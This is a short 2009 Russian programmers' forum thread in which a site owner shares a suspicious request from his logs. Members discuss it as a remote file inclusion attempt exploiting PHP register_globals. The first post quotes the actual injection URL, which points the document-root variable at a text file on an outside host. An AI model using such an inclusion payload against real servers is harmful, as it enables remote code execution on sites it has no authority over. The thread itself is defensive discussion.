Форум программистов «Весельчак У»
  *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

  • Рекомендуем проверить настройки временной зоны в вашем профиле (страница "Внешний вид форума", пункт "Часовой пояс:").
  • У нас больше нет рассылок. Если вам приходят письма от наших бывших рассылок mail.ru и subscribe.ru, то знайте, что это не мы рассылаем.
   Начало  
Наши сайты
     
  Галерея  
  Весельчак У  
  Наша Вики  
  Хранилище  
  Проекты  
     
Правила
     
  Правила форума Правила русского языка  
     
Помощь Поиск Календарь Почта Войти Регистрация  
Форум программистов «Весельчак У» > Направления программирования > Web > Тема: Пытались взломать сайт
 
Страниц: [1]   Вниз
« предыдущая тема следующая тема »
  Печать  
Автор Тема: Пытались взломать сайт  (Прочитано 8677 раз)
0 Пользователей и 3 Гостей смотрят эту тему.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« : 04-11-2009 12:49 » 
h**p://slasoft.kharkov.ua/article/7goodhobits%20%20////?_SERVER[DOCUMENT_ROOT]=h**p://www.caindeaf.or.kr/bbs/data/zfxid1.txt?

Может кто знает механизм взлома?

зы я еще не искал Жаль
Записан
Мы все учились понемногу... Чему-нибудь и как-нибудь.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« Ответ #1 : 04-11-2009 12:55 » 
а может в .htaccess впихнуть
redirect ///?_SERVER[DOCUMENT_ROOT] http://www.microsoft.com
Записан
Мы все учились понемногу... Чему-нибудь и как-нибудь.
RXL
Технический
Администратор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #2 : 05-11-2009 04:29 » 
Слав, я полагаю, тут расчет на register_globals.
Записан
... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
Sla
Команда клуба

ua
Offline Offline
Пол: Мужской

WWW
« Ответ #3 : 06-11-2009 08:13 » 
не понятен механизм, вернее намерения
нужно залить шел на сервер? Но как?
Записан
Мы все учились понемногу... Чему-нибудь и как-нибудь.
Finch
Спокойный
Администратор

il
Offline Offline
Пол: Мужской
Пролетал мимо
« Ответ #4 : 06-11-2009 11:48 » new
Ну скорее всего тут взлом не совсем твоего сайта. А редиректить людей на стороний сайт. Правда, насколько я подозреваю, этот редирект будет в районе одной сессии.
Записан
Не будите спашяго дракона.
             Джаффар (Коша)
Kivals
Команда клуба

ca
Offline Offline
Пол: Мужской

WWW
« Ответ #5 : 06-11-2009 15:06 » 
Гугл выдает огромное количество подобных запросов. Похоже это зомби-машины пытаются использовать известные уязвимости в популярных движках...
Записан
RXL
Технический
Администратор

ru
Offline Offline
Пол: Мужской

WWW
« Ответ #6 : 06-11-2009 22:31 » 
Я не разбирался в деталях, но по моему атака идет на уязвимость каких-то версий специально неправильно настроенного PHP.
Записан
... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
Страниц: [1]   Вверх
  Печать  
« предыдущая тема следующая тема »
 
Форум программистов «Весельчак У» > Направления программирования > Web > Тема: Пытались взломать сайт

Powered by SMF 1.1.21 | SMF © 2015, Simple Machines